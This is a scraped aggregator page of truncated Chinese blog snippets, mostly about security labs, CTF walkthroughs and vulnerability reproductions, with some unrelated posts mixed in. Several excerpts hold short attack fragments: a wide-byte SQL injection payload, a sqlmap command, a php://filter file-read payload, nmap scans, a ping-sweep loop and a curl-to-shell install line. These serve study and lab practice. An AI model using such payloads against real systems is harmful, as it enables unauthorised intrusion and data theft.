2.1.应用系统架构安全设计要求 2.2.应用系统软件功能安全设计要求 2.3.应用系统存储安全设计要求 2.4.应用系统通讯安全设计要求 2.5.应用系统数据库安全设计要求 2.6.应用系统数据安全设计要求软件开发全资料获取：点我获取

【计算机网络第一章知识点总结】 - - - 我为何钟情于计算机：一段有趣的选择之旅

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 目录计算机网络知识目录总结计算机网络第一章目录总结标记考研要点思维导图编辑还记得当初自己…

PKCS#11及其在车联网中的应用

PKCS#11，全称为Public Key Cryptography Standard #11，是一种密码学标准，定义了一个通用的API（应用程序接口）来访问安全设备，如硬件安全模块（HSM）和智能卡。 PKCS#11标准由RSA Labo…

SRC挖掘漏洞XSS

Markdown是一种轻量级标记语言，创始人为约翰格鲁伯（John Gruber）。它允许人们使用易读易写的纯文本格式编写文档，然后转换成有效的 XHTML（或者HTML）文档。这种语言吸收了很多在电子邮件中已有的纯文本标记的…

ARM虚拟化与车联网安全应用

ARM虚拟化简介 ARM虚拟化是指在ARM架构下实现虚拟化技术的方法和技术。虚拟化技术允许在一台物理机上运行多个虚拟机实例，每个虚拟机实例都能够独立运行操作系统和应用程序。 ARM虚拟化的主要目标是提供高效、可扩展和安全的虚拟化环境。以下是一些关键概念和技术…

保姆级 | XSS Platform环境搭建

0x00 前言 XSS Platform 平台主要是用作验证跨站脚本攻击。该平台可以部署在本地或服务器环境中。我们可以使用 XSS Platfrom 平台搭建、学习或验证各种类型的 XSS 漏洞。 0x01 环境说明 HECS(云耀云服务器)xss platformCentOS 8.0Nginx 1.24.0MySQL 5.6.51Pure-Ftpd 1.0.49ph…

网络安全攻击预警/态势预测算法汇总

总结： 网络安全攻击预警/态势预测算法众多，主要包括： 基于统计学的算法：协方差矩阵、马尔可夫模型等； 基于机器学习的算法：贝叶斯网络、聚类算法、支持向量机SVM、遗传算法、层次分析法AHP、决策树等&am…

AGM AG32 MCU用于Mini-LED背光控制应用方案

目前很多设计都是MCUFPGA/CPLD的架构，FPGA主要是处理高速，并发的数据，实时性高，这个是MCU分步骤执行所不能完成的。AGRV2K或者AG32 MCU正好弥补了这个空白。以下我们分享一些应用案例，供大家拓展思路。一、AG32系列MCU…

简单的越权

越权漏洞危害越权漏洞分为水平越权和垂直越权； 水平越权容易造成敏感信息的泄露；垂直越权容易造成服务器权限丢失。普通用户执行管理员操作时，可能会执行一些上传操作，例如一句话木马挖掘我会在数据包中寻找例如id、us…

【JavaFX漏扫开发基础】stage窗口/模式/模态

文章目录 stage一、stage窗口二、stage窗口，模式，模态stage模式（5种样式）模态化窗口stage stage其实就是一个窗口，它啥也不是，打开所有windows的程序都会有一个窗口，这个窗口就是javafx里的stage。里面的内容不属于stage，stage就是一个窗口，就这么简单。 Stage is a…

【圣诞】极安云科赠书活动第①期：CTF实战:从入门到提升

【圣诞】极安云科赠书活动第①期：CTF实战:从入门到提升 9787111724834 9787121376955 9787302556275 ISBN编号：9787111724834 书名：CTF实战:从入门到提升定：99.00元开本：184ｍｍ260&#xff…

安全运维是做什么的，主要工作内容是什么

安全运维，简称SecOps，是一种集成安全措施和流程到信息技术运维的实践。它的目的是确保在日常运维活动中，如网络管理、系统维护、软件更新等，均考虑并融入安全策略。安全运维的核心是实现安全和运维团队的密切协作，以快…

【计算机四级（网络工程师）笔记】操作系统运行机制

目录一、中央处理器（CPU） 1.1CPU的状态 1.2指令分类二、寄存器 2.1寄存器分类 2.2程序状态字（PSW） 三、系统调用 3.1系统调用与一般过程调用的区别 3.2系统调用的分类四、中断与异常 4.1中断 4.2异常 🌈嗨&#xff…

BUUCTF——Reverse——reverse2

1、题目 2、工具 Exeinfo PE：查壳工具。IDA：是一款功能强大的反汇编工具，用于分析和逆向工程二进制文件。 3、方法下载压缩包并解压，得到一个没有后缀的文件。先用Exeinfo PE查询该文件是否加了壳。可以看出，该文…

sqlilabs第三十二三十三关

Less-32（GET - Bypass custom filter adding slashes to dangerous chars) 手工注入由宽字符注入可知payload 成功触发报错 http://192.168.21.149/Less-32/ ?id1%df 要写字符串的话直接吧字符串变成ascii码注意16进制的表示方式自动注入 sqlmap -u http:…

vmware虚拟机中Nat、桥接模式和仅主机的差别

NAT 在NAT模式下，主机3是Kali和Win两个操作系统的宿主机，那么Kali和Win可以连接到外网，也可以和主机3进行互联，但是主机1和主机2不能连接到Kali和Win。桥接在桥接模式下，主机3是Kali和Win两个操作系统的宿主机&…

2023 楚慧杯 --- Crypto wp

文章目录初赛so large e 决赛JIGE 初赛 so large e 题目： from Crypto.Util.number import * from Crypto.PublicKey import RSA from flag import flag import randomm bytes_to_long(flag)p getPrime(512) q getPrime(512) n p*q e random.getrandbits(1…

OFBiz RCE漏洞复现（CVE-2023-51467）

漏洞名称 Apache OFBiz 鉴权绕过导致命令执行漏洞描述 Apache OFBiz是一个非常著名的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式…

小H靶场笔记：DC-3

DC-3 January 3, 2024 4:11 PM Tags：Joomla owner：只惠摸鱼信息收集探测靶机ip： 192.168.199.133 nmap 扫描端口、系统版本漏洞发现只有80端口开发， 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0…

安全防御之密码技术

密码学是信息安全的基础技术之一，是达到信息系统安全等级保护要求的核心技术支持，在身份验证、访问控制、文件加密、数据加密和安全传输中都得到广泛应用。其核心目标是保证信息的机密性、完整性和可用性。密码学包括加密和解密两个部分。一般过程是&am…

$正定矩阵在格密码中的应用（知识铺垫）$

正定矩阵在格密码中的应用（知识铺垫）

目录一. 写在前面二. 最小值点三. 二次型结构四. 正定与非正定讨论 4.1 对参数a的要求 4.2 对参数c的要求 4.3 对参数b的要求五. 最小值，最大值与奇异值 5.1 正定型（positive definite） 5.2 负定型（negative defin…

红队打靶练习:DERPNSTINK: 1

目录信息收集 1、arp 2、netdiscover 3、nmap 4、nikto 5、whatweb 目录探测 1、gobuster 2、dirsearch WEB get flag1 robots.txt /php/phpmyadmin /temporary /weblog wordpress wpscan扫描漏洞发现提权系统信息收集 mysql登录 john get flag2 s…

高清网络视频监控平台的应用-城市大交通系统视联网

目录一、应用需求二、系统架构设计三、功能介绍 1.实时视频监控 2.云台控制 3.语音功能 4. 录像管理与回放 5.告警联动 6.多种显示终端呈现 （1）CS客户端 （2）web客户端 （3&#xf…

APT-C-08 蔓灵花样本分析

APT-C-08 蔓灵花样本分析样本MD5: ade9a4ee3acbb0e6b42fb57f118dbd6b 分析报告下载： 分析报告和样本Github下载

tiktok云手机有用吗？用哪个好？

很多做独立站的跨境卖家都会搭配一些社媒平台给自己引流带货，比如说目前很火的TikTok，这也是目前比较有效的一种引流方式。本文将介绍tiktok运营方法以及如何用tiktok云手机规避运营风险。 TikTok是个不错的风口，不过我们在国内想要运营好Tik…

CISSP 第9章：安全脆弱性、威胁和对策

第九章安全脆弱性、威胁和对策 9.1 评估和缓解安全脆弱性 9.1 硬件处理器执行类型多任务处理： 同时处理两个或更多任务多处理： 利用多个处理器完成一个应用程序的处理能力多程序设计：通过操作系统对单个处理器上的两个任务进行协调&…

因遭受“重大 DDoS 攻击”，官网及服务一度封停或崩溃

1月2日最新消息，Atomicals Market在社交媒体上发文表示，正遭受DDoS攻击，如果网站显示已被封锁，用户请勿担心。团队正在努力解决该问题，预计很快将会恢复正常。开源建模软件 Blender 11月底也曾多次遭受严重 DDoS 攻击…

【漏洞复现】Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895

漏洞描述 Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。 Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版…

2024年我国网络安全发展形势展望

2023年，我国网络安全政策法规陆续出台，网络安全与数据安全产业发展势头强劲，网络安全形势整体向好。展望2024年，世界各国在网络空间中的竞争将变得愈发激烈，我国网络安全领域的法律法规将不断完善，数据安全…

数字化转型对于银行业的价值和思考

银行数字化转型的思考文章目录银行数字化转型的思考一、理论指导银行业数字化转型实践全面提速1、银行业数字化转型内涵2、银行业数字化转型本质3、银行业数字化转型特征（1）数据化(Datafication)。（2）智能化(Intelligentization) 。（3）开放化(Openness) 。（4）生态化(…

cissp 第10章 : 物理安全要求

10.1 站点与设施设计的安全原则物理控制是安全防护的第一条防线，而人员是最后一道防线。 10.1.1 安全设施计划安全设施计划通过关键路径分析完成。关键路径分析用于找出关键应用、流程、运营以及所有必要支撑元索间的关系。技术融合指的是各种技术、解决方案…

网安入门11-文件上传（前后端绕过，变形马图片马）

Upload-Labs Upload-Labs是一个使用PHP语言编写、专注于文件上传漏洞的闯关式网络安全靶场。练习该靶场可以有效地了解并掌握文件上传漏洞的原理、利用方法和修复方案。思考：他只让我传一个.jpg的图片，我想传一个.php的木马，两者什么区别 …

掌握Web、DNS、FTP、DHCP服务器的配置。掌握简单网络方案的规划和设计

1、Web服务器配置 2、综合设计配置完后，所有的终端主机都要能够访问外网服务器，并进行测试。（本题可以自行选题，自行设计，但必须包含路由器、服务器（web、dns、DHCP、）、交换机及防火墙）。 3.做好规划并搭建拓扑图： 4.给PC机与服务器配置好IP，网关 5.给每个交换机…

网络安全（黑客）—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对…

2024黑龙江省职业院校技能大赛信息安全管理与评估样题第二三阶段

2024黑龙江省职业院校技能大赛暨国赛选拔赛 "信息安全管理与评估"样题 *第二阶段竞赛项目试题* 本文件为信息安全管理与评估项目竞赛-第二阶段试题，第二阶段内容包括：网络安全事件响应、数字取证调查和应用程序安全。极安云科专注技能竞赛…

基于信息隐藏技术的安全电子邮件设计与开发

点我完整下载：基于信息隐藏技术的安全电子邮件设计与开发基于信息隐藏技术的安全电子邮件设计与开发 "Design and Development of Secure Email System using Information Hiding Techniques" 目录目录 2 摘要 3 关键词 4 第一章前言 4 1.1 研究背景 4…

数据中心：保障企业运营安全可靠的关键

随着人工智能与云计算的爆发，数据中心行业迎来了前所未有的需求增长。然而，这也带来了一系列的挑战。各地政府机构对数据中心建设出台了更为完善和严格的地方标准，企业面临着运营成本高、人才短缺和节能减排等困难。同时，过去频频…

数据可视化工具选择：功能、易用性与安全性

作为一名数据可视化大屏设计师，我深知选择一款合适的数据可视化工具对于提高工作效率和呈现效果的重要性。下面，我将从真正对我们数据可视化大屏设计师有用的角度为大家介绍选择数据可视化工具的一些必要条件和要求。 1. 功能强大与灵活定制首先&…

网络安全威胁——DDoS攻击

DDoS攻击 1. 定义2. DDoS攻击类型2.1 网络层攻击2.2 传输层攻击2.3 应用层攻击 3.DDoS攻击态势特点 1. 定义分布式拒绝服务（DDoS）攻击是一种常见的网络攻击形式。攻击者利用恶意程序对一个或多个目标发起攻击，企图通过大规模互联网流量耗尽…

useradd 在Linux原生应用开发过程中的简单应用

useradd命令是用于在Linux系统中创建新用户的命令。它可以创建一个新用户，并设置该用户的属性、家目录、默认shell等。useradd命令实际上是一个包装了一系列系统调用的高级命令。在Linux系统中，用户信息存储在/etc/passwd文件中。当执行useradd命令时&…

逻辑漏洞与越权

逻辑漏洞与越权越权如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。越权漏洞形成的原因是后台使用了不合理的权限校验规则导致的。一般越权漏洞容易出现在权限页面（需要登…

web漏洞原理与防御策略，web漏洞怎么挖掘

目录 Web安全的重要性编辑常见的Web漏洞类型及其原理： 1、跨站脚本攻击（XSS）: 2、SQL注入: 3、跨站请求伪造（CSRF）: 4、远程文件包含（RFI）和本地文件包含（LFI）:…

HTB Ouija

Ouija 2023年12月5日（星期二） (GMT+8) 10:00User Nmap ──(root㉿kali)-[/home/kali/Downloads/FakeToa] └─# nmap -A 10.10.11.244 --min-rate 10000 Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:01 EST Stats: 0:00:27

使用cpolar内网穿透实现内网SeaFile私有云盘的公网访问

文章目录 1. 前言2. SeaFile云盘设置2.1 Owncould的安装环境设置2.2 SeaFile下载安装2.3 SeaFile的配置 3. cpolar内网穿透3.1 Cpolar下载安装3.2 Cpolar的注册3.3 Cpolar云端设置3.4 Cpolar本地设置 4.公网访问测试5.结语 1. 前言现在我们身边的只能设备越来越多&#xff0c…

什么是网站劫持

网站劫持是一种网络安全威胁，它通过非法访问或篡改网站的内容来获取机密信息或者破坏计算机系统。如果您遇到了网站劫持问题，建议您立即联系相关的安全机构或者技术支持团队，以获得更专业的帮助和解决方案。

pwn入门：基本栈溢出之ret2libc详解（以32位+64位程序为例）

目录写在开头题目简介解题思路前置知识（简要了解） plt表和got表延迟绑定例题详解 32位 64位总结与思考写在开头这篇博客早就想写了，但由于近期事情较多，一直懒得动笔。近期被领导派去临时给合作单位当讲师&a…

Catf1agCTF-WEB签到

题目环境F12查看源代码考虑到此平台大多flag格式都是catf1ag 那么就斗胆搜索此关键字 CtrlF进行搜索有19种包含结果结果都没有发现flag的存在毕竟是签到题也不要想太麻烦既然出题人说了有flag的存在那就肯定不会骗我们最后猜测到一个非常有意思的出题方式猜测出题人把正…

Weblogic T3协议反序列化漏洞

文章目录 1. Weblogic T3协议反序列化漏洞1.1 漏洞描述1.2 基本原理1.3 漏洞复现1.4 修复建议 1. Weblogic T3协议反序列化漏洞 1.1 漏洞描述说明内容漏洞编号CVE-2018-2628漏洞名称Weblogic T3协议反序列化漏洞漏洞评级高危影响范围Weblogic 10.3.6.0Weblogic 12.1.3.0Webl…

探索SSL证书的应用场景，远不止网站，还有小程序、App Store等

说到SSL证书，我们都知道其是用于实现HTTPS加密保障数据安全的重要工具，在建设网站的时候经常会部署SSL证书。但实际上，SSL证书的应用场景远不止网站，它还被广泛地应用到小程序、App Store、抖音广告、邮件服务器以及各种物联网设备…

《在线业务抗D解决方案-抗D产品的核心优势功能》

●全球资源弹性调配，轻松应对大型攻击：高防能力抗D产品的核心能力，在这方面，我们在全球拥有上万个专用DDoS流量清洗节点，全网防护带宽超10T；结合实时的全局资源弹性调配机制，可为不同行业属性的…

ECU面临的风险介绍(含案例)

ECU（电子控制单元）在信息安全方面主要面临以下问题： 1. 攻击风险 ECU被黑客攻击的风险是最主要的信息安全问题之一。黑客可以通过攻击ECU的硬件漏洞，例如通过物理访问或远程连接，操控ECU的功能，导致车辆失…

Linux DAC权限的简单应用

Linux的DAC（Discretionary Access Control）权限模型是一种常见的访问控制机制，它用于管理文件和目录的访问权限。作为一名经验丰富的Linux系统安全工程师，我会尽可能以简单明了的方式向计算机小白介绍Linux DAC权限模型。在Linu…

IOT安全学习路标

1. 物联网基础知识首先，你需要建立坚实的物联网基础知识，包括IoT的架构和组件，传感器和设备的连接和通信技术，云端和边缘计算等。 2. 通信和网络安全学习关于物联网通信和网络安全的基础知识，包括加密和认证技术、…

2、关于使用ajax验证绕过（实例2）

ajax原理我上一篇有写过，参考：1、关于前端js-ajax绕过-CSDN博客一、实例环境： 为手机上的某一割韭菜app 二、目的： 实现绕过手机验证码，找回密码三、工具： bp代理四、验证步骤如下： …

shiro反序列化及流量分析

shiro反序列化漏洞原理在 Apache shiro 的框架中，执行身份验证时提供了一个记住密码的功能（RememberMe），如果用户登录时勾选了这个选项。用户的请求数据包中将会在 cookie 字段多出一段数据，这一段数据包含了用户的…

2024年网络安全（黑客）自学规划

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

IOS安全学习路标

1. iOS基础知识 - 学习Objective-C和Swift编程语言，了解iOS开发的基本原理。 - 熟悉iOS应用的启动过程，包括应用生命周期、应用的主线程和多线程开发等。 - 了解iOS应用的应用包结构，包括应用程序包（.app文件）、库和资…

Web漏洞扫描工具有哪些？使用教程讲解

作为网络安全工程师，了解并掌握各种Web漏洞扫描工具对于识别和防御网络威胁至关重要。以下是一些常用且广受推崇的Web漏洞扫描工具，它们覆盖了从自动扫描到深度定制的各种需求。希望你能用得到呢。 1. OWASP ZAP (Zed Attack Proxy) 原理：…

beebox靶场A3 low级别 xss通关教程（三）

十一：xss user-agent 开启burp抓包拦截修改user-agent ，在最后面加上xss脚本即可成功十二：xss存储型 blog 直接在提交框里输入xss脚本，然后这段代码就存在了数据库中在每次刷新后就可以看到存储的漏洞代码十三&#xff1a…

Vulnhub-DC-2 靶机复现完整过程

环境准备： kali: NAT模式网段 ：192.168.200.0 DC-2: NAT模式网段 ：192.168.200.0 保证靶机和攻击机在一个网段上信息收集收集同网段存货主机IP地址 nmap -sP ip地址 arp-scan -l显示错误页面，显然是重定向错误&#xff0c…

2024年网络安全（黑客）——自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

网神SecGate 3600防火墙 app_av_import_save接口任意文件上传漏洞复现 [附POC]

文章目录网神SecGate 3600防火墙 app_av_import_save接口任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议网神SecGate 3600防火墙 app_av_import_save接口任意文件上传漏洞复现 [附PO…

网络安全/黑客技术—自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

[陇剑杯 2021]日志分析

[陇剑杯 2021]日志分析题目做法及思路解析（个人分享） 问一：单位某应用程序被攻击，请分析日志，进行作答： 网络存在源码泄漏，源码文件名是_____________。(请提交带有文件后缀的文件名&…

思科最新版Cisco Packet Tracer 8.2.1安装

思科最新版Cisco Packet Tracer 8.2.1安装一. 注册并登录CISCO账号二. 下载 Cisco Packet Tracer 8.2.1三. 安装四. 汉化五. cisco packet tracer教学文档六. 正常使用图前言这是我在这个网站整理的笔记,有错误的地方请指出，关注我，接下来还会持续更新…

二、安全与风险管理—信息安全治理

目录 1.如何理解信息安全治理 2.信息安全治理与信息安全管理的定义 3.常见企业管理控制参考框架

Upload_Bypas，一款针对文件上传的Fuzz检测工具

Upload_Bypas，一款针对文件上传的Fuzz检测工具 1.工具概述2.安装3.参数解析4.使用方法1.工具概述 Upload_Bypass 是一个强大的工具，旨在帮助渗透测试人员和 Bug Hunters 测试文件上传机制。它利用各种漏洞赏金技术来简化识别和利用漏洞的过程，确保对 Web 应用程序进行全面评…

孩子还是有一颗网安梦——Bandit通关教程：Level 11 → Level 12

🕵️‍♂️ 专栏《解密游戏-Bandit》 🌐 游戏官网： Bandit游戏 🎮 游戏简介： Bandit游戏专为网络安全初学者设计，通过一系列级别挑战玩家，从Level0开始，逐步学习基础命令行和安全概念…

Autosar基础安全架构简介

AUTOSAR基础安全架构（BSW Security）是AUTOSAR标准中的一个模块，旨在提供用于保护汽车电子系统的基本安全功能和服务。基础安全架构包括访问控制、身份认证、加密、数字签名、密钥管理等关键安全功能。下面详细介绍AUTOSAR基础安全架构的主要…

西工大网络空间安全学院计算机系统基础实验二（清楚实验框架及phase_1）

首先，将自己的实验包从Windows系统中使用scp命令传到Linux虚拟机中。而要想传到Linux虚拟机中，第一步就是要确定Linux虚拟机的IP地址，如图1：确定Linux虚拟机的IP地址所示。接着使用scp命令将实验包从Windows系统传送到Linux虚拟…

网络安全/黑客技术--小白自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

Web安全-SQL注入【sqli靶场第11-14关】(三)

★★实战前置声明★★ 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 0、总体思路先确认是否可以SQL注入&#xff0…

Misdriection

信息收集存活主机探测 # nmap -sn 192.168.110.0/24 -oN live.nmap Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 19:58 CST Nmap scan report for 192.168.110.1 Host is up (0.00024s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for…

域渗透之影子凭证滥用密钥信任账户映射进行账户接管

关注公众号回复20231110获取最新网络安全以及内网渗透等资料。什么是 PKINIT？ 在 Kerberos 身份验证中，客户端必须在 KDC为其提供票证授予票证 (TGT) 之前执行“预验证”，该票证随后可用于获取服务票证。预认证的原因是，没有它&…

红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC]

文章目录红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法…

DNSLog漏洞探测(六)之SSRF漏洞实战

DNSLog漏洞探测(六)之SSRF漏洞实战本文我们来学习如何利用DNSLog平台探测目标网站是否存在SSRF漏洞，接下来我们还是利用Pikachu的靶场作为演示。首先我们先进入Pikachu靶场的SSRF漏洞界面。SSRF漏洞更多的可以称之为服务端的请求伪造。像是原本探测漏洞的手段&am…

SSL证书可以有效避免劫持和钓鱼攻击

SSL证书对抗劫持和钓鱼攻击起到重要作用。通过使用SSL证书，网站可以防止黑客篡改网站内容或欺骗用户，确保用户所看到的是真实的网站信息，而不是被篡改的内容或诱导性的信息。这有助于保护用户的隐私和安全，并建立用户对网站的信任…

黑客（网络安全）技术速成自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

嵌入式安全学习路标

1. 嵌入式系统基础知识首先，你需要建立坚实的嵌入式系统基础知识，包括嵌入式系统的构成和特点，微处理器架构，实时操作系统（RTOS）的原理和应用等。 2. 物理安全学习关于物理安全的基础知识，…

多个安全厂商安全设备远程命令执行漏洞复现

前言此文章仅用于技术交流，严禁用于对外发起恶意攻击！！！ 一、影响范围目前已知的存在该漏洞的产品： H3C-下一代防火墙安全信息-明御安全网关 MAIPU-安全网关 D-Link-下一代防火墙 Huawei-产品迈普通信技术股份有…

Weblogic-wls-wsat-unserialize_CVE-2017-10271

文章目录 Weblogic < 10.3.6 wls-wsat XMLDecoder 反序列化漏洞1. 漏洞描述2. 漏洞复现2.1 环境启动2.2 漏洞扫描2.3 漏洞验证 3. 修复建议 Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞 1. 漏洞描述说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic <…

Linux横向移动

Linux横向移动主机存活探测 shell for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done 或者 for k in $( seq 1 255);do ping -c 1 192.168.1.$k|grep "ttl"|awk -F "[ :]" {print $4}; d…

搭建Tomcat调试环境并分析CVE-2017-12615

准备下载存在漏洞版本tomcat，这里下的是8.0.45 https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.45/ 可执行文件和源码都需要下载用idea打开源码文件，然后将java目录设置为源码目录配置一下jdk 转成maven项目添加一些依赖 <dependencie…

内网渗透（一）

预备知识什么是内网渗透？ 在我们拿下目标服务器后，对其局域网进行攻击，比如提权、权限维持、数据提取如何绕过1290安全性报错？ mysql日志法（root权限） 1.show variables like ‘%general%’; #查看配…

任意文件读取漏洞

使用方法php://filter/readconvert.base64-encode/resourcexxx 任意文件读取漏洞 php://filter/readconvert.base64-encode/resourceflag 在url后边接上以base64的编码形式读取flag里面的内容 php://filter/readconvert.base64encode/resourceflag 用kali来解码创建一个文…

网络安全知识｜黑客是如何入侵一个网站的？

刚出商场想打车回家，发现滴滴崩了？ 前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是，作为一个网络安全研究人员，我不提供或者鼓励任何违法的行为，包括未经授权的计算机系统入侵…

二、安全与风险管理—法律法规符合性与职业道德

目录一、攻击的演变二、不同的法律体系 2.1 法律分类 2.2 知识产权 2.3 隐私保护

漏洞环境搭建（利用ubuntu）

在此，先感谢平台及互联网~ 漏洞环境搭建（利用ubuntu） 1.先下载乌班图自己安装镜像（iso) 2.安装最新版本的docker curl -s https://get.docker.com/ | sh 运行docker服务 systemctl start docker 3.下载项目 wget htt…

[LitCTF 2023]这是什么？SQL ！注一下！

[LitCTF 2023]这是什么？SQL ！注一下 ！ wp 题目描述：为了安全起见多带了几个套罢了o(▽)q 页面内容（往下滑）： SQL 语句已给出，无非是更换了闭合方式。先输个 1 试试： …

Weblogic安全漫谈（四）

黑名单机制必然会推动两种研究方向的发展：一是挖掘不在黑名单的新组件，是为绕过规则；二是发掘检查的盲区，是为绕过逻辑。 CVE-2020-14756 二次反序列化具有对抗检查逻辑的天生丽质，在CVE-2018-2893中就有利用字节数组…

安全防御之安全审计技术

安全防御中的安全审计技术是保障信息系统安全的重要手段之一。其主要目标是对信息系统及其活动进行记录、审查和评估，以确保系统符合安全策略、法规要求，并能够及时发现潜在的安全风险和异常行为。通过安全审计，可以对系统中的各种活动进行记…

HackTheBox - Medium - Linux - BroScience

BroScience BroScience 是一款中等难度的 Linux 机器，其特点是 Web 应用程序容易受到“LFI”的攻击。通过读取目标上的任意文件的能力，攻击者可以深入了解帐户激活码的生成方式，从而能够创建一组可能有效的令牌来激活新创建的帐户。登录后&a…

密码学中的Hash函数

目录一. 介绍二. hash函数的五个基本性质 （１）压缩性 （２）正向计算简单性 （３）逆向计算困难性 （４）弱无碰撞性 （&…

网络安全—IPSec安全策略

文章目录网络拓扑添加策略ESP添加筛选器添加筛选器的操作另一台主机设置 AH 使用Windows Server 2003系统网络拓扑 client1 IP 192.168.17.105client2 IP 192.168.17.106 只要保证两个主机在同一网段接口，即互相ping通即可完成策略的实现下面的所有通讯都只是…

爬虫-1-请求和响应

#无以规矩，不成方圆(ﾉ_ _)ﾉ <(_ _)> 请求和响应案例实现

医疗卫生行业网络安全需求发展

文章目录一、行业安全建设需求分析1、等级保护2.0合规建设云计算技术大数据技术物联网技术移动互联网技术2、加强医疗数据安全保护加密存储与传输数据加强数据备份与恢复注重数据脱敏与分级保护3、强化网络安全制度管理完善应急预案与响应机制加强网络安全人员管理二、行业新技…

网络安全—PKI公钥基础设施

文章目录前提知识散列函数非对称加密数字签名 PKI受信任的人RA注册CA颁发IKE数字签名认证（交换证书）密钥管理前提知识散列函数散列也可以叫哈希函数，MD5、SHA-1、SHA-2、、（不管叫啥，都记得是同一个东西就行&…

基于美国应对网络生物安全风险的报告的思考

文章目录前言一、美国为什么要加强网络生物安全的应对手段？二、网络生物安全威胁因素1、合成生物学可及性的增强2、全球高生物安全等级设施的扩增3、生物目标的广泛性4、攻击途径的多样化5、自动化的快速发展三、美国网络生物安全的主要漏洞四、美国出现的典型安全漏洞1、恶…

sqlilabs第五十五五十六关

Less-55(GET - challenge - Union- 14 queries allowed -Variation 2) 手工注入结束自动注入想到一个办法能绕过需要用到IP池就可以（但是我没有） Less-56(GET - challenge - Union- 14 queries allowed -Variation 3) 手工注入

sqlilabs第四十九五十关

Less-49(GET - Error based - String Bind - ORDER BY CLAUSE) 手工注入无回显(还是单引号闭合)，只能使用延时注入自动脚本和上一关一样 Less-50(GET - Error based - ORDER BY CLAUSE -numeric- Stacked injection) 手工注入这里需要使用堆叠注入的思路自…

探索计算机网络：应用层的魅力

在当今数字化时代，计算机网络已成为我们生活和工作中不可或缺的一部分。网络的每一层都扮演着独特而重要的角色，而应用层，作为网络模型中用户最直接接触的部分，其重要性不言而喻。这篇文章旨在深入探索应用层的核心概念、功能以及…

红日靶场5

目录前言外网渗透信息收集 1、arp探测 2、nmap 3、nikto 4、whatweb 5、gobuster 6、dirsearch 漏洞探测 ThinKPHP漏洞漏洞利用 get shell 内网渗透信息收集 CS 启动！ CS连接 CS信息收集 1、hashdump 2、猕猴桃 3、端口扫描 MSF启动&…

二、安全与风险管理—练习题

分析美方推动零信任战略的网络安全创新规律（下）

分析美方推动零信任战略的网络安全创新规律（下）文章目录分析美方推动零信任战略的网络安全创新规律（下）前言一、零信任理念产生的成因和创新价值（一）零信任是在传统IT边界消亡时对安全边界的重塑（二）零信任是对原有安全能力体系的重新整合（三）零信任创新的价值在于…

网络安全B模块（笔记详解）- Web信息收集

Web信息收集 1.通过Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，查看该命令的完整帮助文件），并将该操作使用命令中固定不变的字符串作为Flag提交； Flag：nikto -H 2.通过Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，扫描目标服务器8080端口，…

网络安全（黑客技术）—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

vue.js-3

#前后端交互

【漏洞复现】大华 DSS 数字监控系统 itcBulletin SQL 注入

